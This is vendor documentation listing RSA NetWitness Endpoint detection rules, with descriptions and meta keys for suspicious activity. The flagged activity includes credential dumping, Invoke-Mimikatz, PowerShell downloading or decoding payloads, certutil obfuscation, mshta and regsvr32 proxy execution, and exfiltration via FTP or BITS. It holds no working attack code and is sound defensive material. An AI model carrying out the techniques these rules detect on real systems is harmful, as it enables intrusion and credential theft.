RSA Application Rules for Endpoint

Document created by RSA Information Design and Development on Apr 10, 2019. Last modified by RSA Information Design and Development on Jun 17, 2019.
Version 9

The following entries list the RSA Application Rules for NetWitness Endpoint. Each entry gives the rule's display name, file name, and description, followed (where documented) by the versions supported, the dependencies, and the generated meta keys.

Accesses Administrative Share Using Command Shell

FILE NAME
* accesses_administrative_share_using_command_shell

DESCRIPTION
* Accessing an administrative share from a command shell can be an indicator of someone attempting lateral movement or privilege escalation by using hidden network shares that are accessible only to administrators and that allow remote file copy and other administrative functions. This rule is supported on Windows 8 and higher.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = accesses administrative share using command shell

Runs File Attributes Modification Tool

FILE NAME
* runs_file_attributes_modification_tool

DESCRIPTION
* Running a file attributes modification tool can be an indication of adversaries using it to hide files and folders anywhere on the system for persistence, evading a typical user or system analysis that does not include investigation of hidden files.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs file attributes modification tool

Runs DNS Lookup Tool

FILE NAME
* runs_dns_lookup_tool

DESCRIPTION
* Running nslookup.exe can be used to get information about the Domain Name System (DNS) configuration used by the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs dns lookup tool

Runs Ditto

FILE NAME
* runs_ditto

DESCRIPTION
* Ditto copies files and directories from the Mac terminal.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs ditto

Runs Curl

FILE NAME
* runs_curl

DESCRIPTION
* Curl is used in command lines or scripts to transfer data via URLs.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs curl

Runs Credential Dumping Tools

FILE NAME
* runs_credential_dumping_tools

DESCRIPTION
* Running credential dumping tools can be an indication of someone trying to bypass credential checks to gain a privileged foothold, giving them unfettered access to elevate privileges and move through the network without detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = loads credential dumping library

Runs Chmod

FILE NAME
* runs_chmod

DESCRIPTION
* Chmod is used to modify file and directory permissions.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs chmod

Runs Chained Command Shell

FILE NAME
* runs_chained_command_shell

DESCRIPTION
* Running a chained command shell can be an indication of someone running the multiple malicious commands needed for a multi-stage attack on the system, which can be further used to gain access, move laterally, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs chained command shell

Runs Certutil With Hashfile Arguments

FILE NAME
* runs_certutil_with_hashfile_arguments

DESCRIPTION
* CertUtil, the Windows certificate management utility, can install, back up, delete, manage, and perform various other functions on certificates and certificate stores in Windows. Running certutil with the hashfile argument can be an indication of someone trying to obfuscate malicious files to exploit the system, which can be further used to gain access, move laterally, or gain elevated privileges. Attackers may take advantage of this to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs certutil with hashfile arguments

Runs Certutil With Encode Arguments

FILE NAME
* runs_certutil_with_encode_arguments

DESCRIPTION
* CertUtil, the Windows certificate management utility, can install, back up, delete, manage, and perform various other functions on certificates and certificate stores in Windows. Running certutil with the encode argument can be an indication of someone trying to obfuscate malicious commands to exploit the system, which can be further used to gain access, move laterally, or gain elevated privileges. Attackers may take advantage of this to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs certutil with encode arguments

Runs Certutil With Decode Arguments

FILE NAME
* runs_certutil_with_decode_arguments

DESCRIPTION
* CertUtil, the Windows certificate management utility, can install, back up, delete, manage, and perform various other functions on certificates and certificate stores in Windows. Running certutil with the decode argument can be an indication of someone trying to obfuscate malicious commands to exploit the system, which can be further used to gain access, move laterally, or gain elevated privileges. Attackers may take advantage of this to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs certutil with decode arguments

Runs Blacklisted File

FILE NAME
* runs_blacklisted_file

DESCRIPTION
* An analyst may mark files as blacklisted within NetWitness Endpoint. If actions on an endpoint involve those blacklisted files as the destination process, this rule triggers.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs blacklisted file

Runs Binary Located In System Volume Information Directory

FILE NAME
* runs_binary_located_in_system_volume_information_directory

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs binary located in system volume information directory

Runs Binary Located In Root Of Users Directory

FILE NAME
* runs_binary_located_in_root_of_users_directory

DESCRIPTION
* While the majority of programs are stored in folders on a system, it is uncommon to see a binary in the root of a user's home directory, and this location is sometimes used by malware.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs binary located in root of users directory

Runs Binary Located In Root Of Program Directory

FILE NAME
* runs_binary_located_in_root_of_program_directory

DESCRIPTION
* ProgramData is hidden in Windows by default; its main use is for application data that is not user specific, meaning that it applies to "All Users". If malware were placed here, it would run for any user who logs into the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs binary located in root of program directory

Runs Binary Located In Root Of Logical Drive

FILE NAME
* runs_binary_located_in_root_of_logical_drive

DESCRIPTION
* While the majority of programs are stored in folders on a system, it is uncommon to see a binary in the root of the "C:" drive.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs binary located in root of logical drive

Runs Binary Located In Recycle Bin Directory

FILE NAME
* runs_binary_located_in_recycle_bin_directory

DESCRIPTION
* Malware authors have used a technique where a malicious file or process is invoked and runs out of the $RECYCLE.BIN folder on Windows systems.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs binary located in recycle bin directory

Runs Active Directory Service Query Tool

FILE NAME
* runs_active_directory_service_query_tool

DESCRIPTION
* Running an Active Directory service query tool can be an indication of someone trying to discover potential attack vectors in the system, which can then be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs active directory service query tool

Runs ACL Management Tool

FILE NAME
* runs_acl_management_tool

DESCRIPTION
* Running an ACL management tool can be an indication of someone running the multiple malicious commands needed for a multi-stage attack on the system, which can be further used to gain access, move laterally, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs acl management tool

Rundll32 Runs Powershell

FILE NAME
* rundll32_runs_powershell

DESCRIPTION
* The Rundll32 program can be called to execute an arbitrary binary. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = rundll32 runs powershell

Rundll32 Creates Windows Task

FILE NAME
* rundll32_creates_windows_task

DESCRIPTION
* The Rundll32 program can be called to execute an arbitrary binary. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = rundll32 creates windows task

RPM Hash Mismatch In Important System Directory

FILE NAME
* rpm_hash_mismatch_in_important_system_directory

DESCRIPTION
* A hash mismatch may indicate a file has been altered from its original state and call its integrity into question. Since RPMs typically contain compiled software, this could mean an attacker is trying to disguise malware as legitimate software.

RPM Hash Mismatch

FILE NAME
* rpm_hash_mismatch

DESCRIPTION
* A hash mismatch may indicate a file has been altered from its original state and call its integrity into question. Since RPMs typically contain compiled software, this could mean an attacker is trying to disguise malware as legitimate software.

Regsvr32 Writes Executable

FILE NAME
* regsvr32_writes_executable

DESCRIPTION
* Regsvr32.exe is a command-line program used to register and unregister object linking components such as dynamic link libraries (DLLs) on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools. Regsvr32 writing an executable could indicate delivery of a backdoor to the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = regsvr32 writes executable

Runs File Transfer Tool

FILE NAME
* runs_file_transfer_tool

DESCRIPTION
* Running a file transfer program can be an indication of an adversary potentially performing data exfiltration to an off-site location.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs file transfer tool

Runs forfiles.exe

FILE NAME
* runs_forfiles.exe

DESCRIPTION
* Running forfiles.exe can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs forfiles.exe

Runs Graylisted File

FILE NAME
* runs_graylisted_file

DESCRIPTION
* An analyst may mark files as graylisted within NetWitness Endpoint. If actions on an endpoint involve those graylisted files as the destination process, this rule triggers.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs graylisted file

Runs Ifconfig

FILE NAME
* runs_ifconfig

DESCRIPTION
* The ifconfig utility is used to assign an address to a network interface or configure network interface parameters.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs ifconfig

Runs Powershell With HTTP Argument

FILE NAME
* runs_powershell_with_http_argument

DESCRIPTION
* Running PowerShell with an HTTP argument can be an indication of someone trying to connect to the internet and retrieve malicious commands or downloaders, which can be further used to gain access, move laterally, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell with http argument

Runs Powershell With Hidden Window

FILE NAME
* runs_powershell_with_hidden_window

DESCRIPTION
* Running PowerShell with a hidden window can be an indication of someone running malicious commands in stealth mode, so that the PowerShell window is not visible, to exploit the system, which can be further used to gain access, move laterally, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell with hidden window

Runs Powershell Using Environment Variables

FILE NAME
* runs_powershell_using_environment_variables

DESCRIPTION
* Running PowerShell using environment variables can be an indication of someone running malicious commands with particular variables, such as the path, to exploit the system, which can be further used to gain access, move laterally, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell using environment variables

Runs Powershell Using Encoded Command

FILE NAME
* runs_powershell_using_encoded_command

DESCRIPTION
* Running PowerShell using an encoded command can be an indication of someone trying to obfuscate malicious commands to exploit the system, which can be further used to gain access, move laterally, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell using encoded command

Runs Powershell ShellExecute Function

FILE NAME
* runs_powershell_shellexecute_function

DESCRIPTION
* Running the PowerShell ShellExecute function can be an indication of someone trying to execute malicious shell code to exploit the system, which can be further used to gain access, move laterally, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell shellexecute function

Runs Powershell Memory Stream Function

FILE NAME
* runs_powershell_memory_stream_function

DESCRIPTION
* Running the PowerShell memory stream function can be an indication of someone trying to execute malicious I/O commands to exploit the system, which can be further used to gain access, move laterally, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell memory stream function

Runs Powershell Invoke-Mimikatz Function

FILE NAME
* runs_powershell_invoke-mimikatz_function

DESCRIPTION
* Mimikatz has become an extremely effective attack tool against Windows clients. Running the PowerShell Invoke-Mimikatz function is an indication of someone trying to use Mimikatz to exploit the system, which can be further used to gain access, move laterally, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = runs powershell invoke-mimikatz function

Runs Powershell Downloading Content

FILE NAME
* runs_powershell_downloading_content

DESCRIPTION
* Attackers mainly use PowerShell as a downloader on Windows-based systems. PowerShell downloading content can be an indication of someone trying to download malicious payloads from the internet to exploit the system, which can be further used to gain access, move laterally, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell downloading content

Runs Powershell Defining Function

FILE NAME
* runs_powershell_defining_function

DESCRIPTION
* Running PowerShell that defines functions can be an indication of someone trying to exploit the system, which can be further used to gain access, move laterally, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell defining function

Runs Powershell Decoding Base64 String

FILE NAME
* runs_powershell_decoding_base64_string

DESCRIPTION
* Running PowerShell that decodes a base64 string can be an indication of someone trying to obfuscate malicious commands to exploit the system, which can be further used to gain access, move laterally, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell decoding base64 string

Runs Powershell Bypassing Execution Policy

FILE NAME
* runs_powershell_bypassing_execution_policy

DESCRIPTION
* Running PowerShell with the execution policy bypassed ignores the execution policy restrictions in order to run commands that exploit the system, which can be further used to gain access, move laterally, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell bypassing execution policy

Regsvr32 Runs Rundll32

FILE NAME
* regsvr32_runs_rundll32

DESCRIPTION
* Regsvr32.exe is a command-line program used to register and unregister object linking components such as dynamic link libraries (DLLs) on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools. This rule detects unusual behavior in the form of registering and running a DLL in the same command.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = regsvr32 runs rundll32

Runs Powershell

FILE NAME
* runs_powershell

DESCRIPTION
* Common cyber criminals and targeted attackers heavily use PowerShell, as its flexibility makes it an ideal attack tool for Windows-based systems. Running PowerShell can be an indication of someone trying to exploit the system, which can be further used to gain access, move laterally, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs powershell

Runs One Letter Script

FILE NAME
* runs_one_letter_script

DESCRIPTION
* A single-letter file name can be a potential indicator of malware or an attacker tool. When an attacker has remote access to a machine, they want to limit the amount of typing needed and will at times name a script or program with a single letter to allow quicker access.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs one letter script

Runs One Letter Executable

FILE NAME
* runs_one_letter_executable

DESCRIPTION
* A single-letter file name can be a potential indicator of malware or an attacker tool. When an attacker has remote access to a machine, they want to limit the amount of typing needed and will at times name a script or program with a single letter to allow quicker access.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs one letter executable

Runs Network Connectivity Tool

FILE NAME
* runs_network_connectivity_tool

DESCRIPTION
* Running a network connectivity tool can be an indication of someone trying to discover potential attack vectors in the system, which can then be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs network connectivity tool

Runs Network Configuration Tool

FILE NAME
* runs_network_configuration_tool

DESCRIPTION
* Netsh.exe is a command-line utility that allows someone to display or change the network configuration of a local or remote computer.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs network configuration tool

Runs Netstat

FILE NAME
* runs_netstat

DESCRIPTION
* Netstat is a network utility tool that can be used to discover network topology, statistics, and performance information.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs netstat

Runs Mshta With Script Argument

FILE NAME
* runs_mshta_with_script_argument

DESCRIPTION
* Mshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. It is suspicious for Mshta to run with a script argument.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs mshta with script argument

Runs Mshta With HTTP Argument

FILE NAME
* runs_mshta_with_http_argument

DESCRIPTION
* Mshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. It is suspicious for Mshta to run with an HTTP argument.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs mshta with http argument

Runs Malicious File By Reputation Service

FILE NAME
* runs_malicious_file_by_reputation_service

DESCRIPTION
* This rule indicates execution of files whose hashes are tagged as malicious by the reputation service.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = runs malicious file by reputation service

Runs Launchctl

FILE NAME
* runs_launchctl

DESCRIPTION
* Launchctl is used to control services.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs launchctl

Runs Kextstat

FILE NAME
* runs_kextstat

DESCRIPTION
* Kextstat displays the status of loaded kernel extensions (kexts).

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs kextstat

Runs Kextload

FILE NAME
* runs_kextload

DESCRIPTION
* The kextload program is used to load kernel extensions (kexts). For most kexts, kextload must run as the superuser.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs kextload

Runs Ping

FILE NAME
* runs_ping

DESCRIPTION
* Ping is used to see if a host is reachable on a network.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs ping

Runs Powershell With Long Arguments

FILE NAME
* runs_powershell_with_long_arguments

DESCRIPTION
* Running PowerShell with long arguments can be an indication of someone trying to run malicious PowerShell commands, which can be further used to gain access, move laterally, or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell with long arguments

Regsvr32 Runs Powershell

FILE NAME
* regsvr32_runs_powershell

DESCRIPTION
* Regsvr32.exe is a command-line program used to register and unregister object linking components such as dynamic link libraries (DLLs) on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = regsvr32 runs powershell

Registry Tools Disabled

FILE NAME
* registry_tools_disabled

DESCRIPTION
* An administrative user has disabled access to the registry editor.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = registry tools disabled

Opens OS Process

FILE NAME
* opens_os_process

DESCRIPTION
* This may indicate process injection, which is a method of executing arbitrary code in the address space of a separate live process. Execution via process injection may also evade detection by security products, since the execution is masked under a legitimate process.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = opens os process

Opens Browser Process

FILE NAME
* opens_browser_process

DESCRIPTION
* When a file not digitally signed by Apple opens a browser process, it might indicate an adversary attempting process injection into the browser.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = opens browser process

Office Application Writes Executable

FILE NAME
* office_application_writes_executable

DESCRIPTION
* A Microsoft Office application writing an executable may indicate a spearphishing attachment with a malicious payload.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application writes executable

Office Application Runs WMI Scripting Engine

FILE NAME
* office_application_runs_wmi_scripting_engine

DESCRIPTION
* A Microsoft Office application running Windows Management Instrumentation (WMI) may indicate a spearphishing attachment with a malicious payload.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs wmi scripting engine

Office Application Runs Task Scheduler

FILE NAME
* office_application_runs_task_scheduler

DESCRIPTION
* A Microsoft Office application running a job or scheduling a task may indicate a spearphishing attachment with a malicious payload.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs task scheduler

Office Application Runs Scripting Engine

FILE NAME
* office_application_runs_scripting_engine

DESCRIPTION
* A Microsoft Office application running a scripting engine may indicate that a spearphishing attachment with a malicious payload has been executed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs scripting engine

Office Application Runs Scripted FTP

FILE NAME
* office_application_runs_scripted_ftp

DESCRIPTION
* A Microsoft Office application running scripted FTP may indicate a spearphishing attachment with a malicious payload. FTP may be used to exfiltrate data outside the environment.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs scripted ftp

Office Application Runs Powershell

FILE NAME
* office_application_runs_powershell

DESCRIPTION
* A Microsoft Office application running PowerShell may indicate that a spearphishing attachment with a malicious payload has been executed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs powershell

Office Application Runs Command Prompt

FILE NAME
* office_application_runs_command_prompt

DESCRIPTION
* A Microsoft Office application running the command prompt may indicate that a spearphishing attachment with a malicious payload has been executed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs command prompt

Office Application Runs BITS

FILE NAME
* office_application_runs_bits

DESCRIPTION
* A Microsoft Office application running Background Intelligent Transfer Service (BITS) may indicate a spearphishing attachment with a malicious payload. BITS may be used to exfiltrate data outside the environment.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs bits

Office Application Injects Remote Process

FILE NAME
* office_application_injects_remote_process

DESCRIPTION
* A Microsoft Office application injecting into a remote process may indicate a spearphishing attachment with a malicious payload. Process injection may enable an attacker to gain access to system resources or elevate privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application injects remote process

Office Application Crashed

FILE NAME
* office_application_crashed

DESCRIPTION
* Microsoft Office application crashes can happen fairly frequently, but this may be interesting in combination with other indicators involving those applications.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application crashed

Writes Malicious File By Reputation Service

FILE NAME
* writes_malicious_file_by_reputation_service

DESCRIPTION
* This rule indicates execution of files whose hashes are tagged as malicious by the reputation service.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = writes malicious file by reputation service

Non-Microsoft Modifies Zone Crossing Warning Setting

FILE NAME
* non-microsoft_modifies_zone_crossing_warning_setting

DESCRIPTION
* A non-Microsoft process modifying the zone crossing warning setting can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported or making forensic analysis and incident response more difficult due to a lack of sufficient data to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies zone crossing warning setting

Non-Microsoft Modifies Windows System Policy (non-microsoft_modifies_windows_system_policy)
A non-Microsoft process modifying Windows system policy can indicate an attempt to compromise the integrity of the security solution, causing events to go unreported or making forensic analysis and incident response more difficult because too little data remains to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies windows system policy

Non-Microsoft Modifies Task Manager Setting (non-microsoft_modifies_task_manager_setting)
A non-Microsoft process modifying the Task Manager setting can indicate an attempt to compromise the integrity of the security solution, causing events to go unreported or making forensic analysis and incident response more difficult because too little data remains to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies task manager setting

Non-Microsoft Modifies Services ImagePath (non-microsoft_modifies_services_imagepath)
A non-Microsoft process modifying a service's ImagePath can indicate an attempt to hijack an existing service to persist malware on the system, either through system utilities or through custom tools that interact with the Windows API.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies services imagepath

Non-Microsoft Modifies Security Center Config (non-microsoft_modifies_security_center_config)
A non-Microsoft process modifying the Security Center configuration can indicate an attempt to compromise the integrity of the security solution, causing events to go unreported or making forensic analysis and incident response more difficult because too little data remains to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies security center config

Non-Microsoft Modifies Registry Editor Setting (non-microsoft_modifies_registry_editor_setting)
A non-Microsoft process modifying the Registry Editor setting can indicate an attempt to compromise the integrity of the security solution, causing events to go unreported or making forensic analysis and incident response more difficult because too little data remains to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies registry editor setting

Non-Microsoft Modifies LUA Setting (non-microsoft_modifies_lua_setting)
A non-Microsoft process modifying the LUA (User Account Control) setting can indicate an attempt to compromise the integrity of the security solution, causing events to go unreported or making forensic analysis and incident response more difficult because too little data remains to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies lua setting

Non-Microsoft Modifies Internet Zone Setting (non-microsoft_modifies_internet_zone_setting)
A non-Microsoft process modifying Internet zone settings can indicate an attempt to compromise the integrity of the security solution, causing events to go unreported or making forensic analysis and incident response more difficult because too little data remains to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies internet zone setting

Non-Microsoft Modifies Firewall Policy (non-microsoft_modifies_firewall_policy)
A non-Microsoft process modifying the firewall policy can indicate an attempt to compromise the integrity of the security solution, causing events to go unreported or making forensic analysis and incident response more difficult because too little data remains to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies firewall policy

Non-Microsoft Modifies Bad Certificate Warning Setting (non-microsoft_modifies_bad_certificate_warning_setting)
A non-Microsoft process modifying the bad certificate warning setting can indicate an attempt to compromise the integrity of the security solution, causing events to go unreported or making forensic analysis and incident response more difficult because too little data remains to determine that an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies bad certificate warning setting
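
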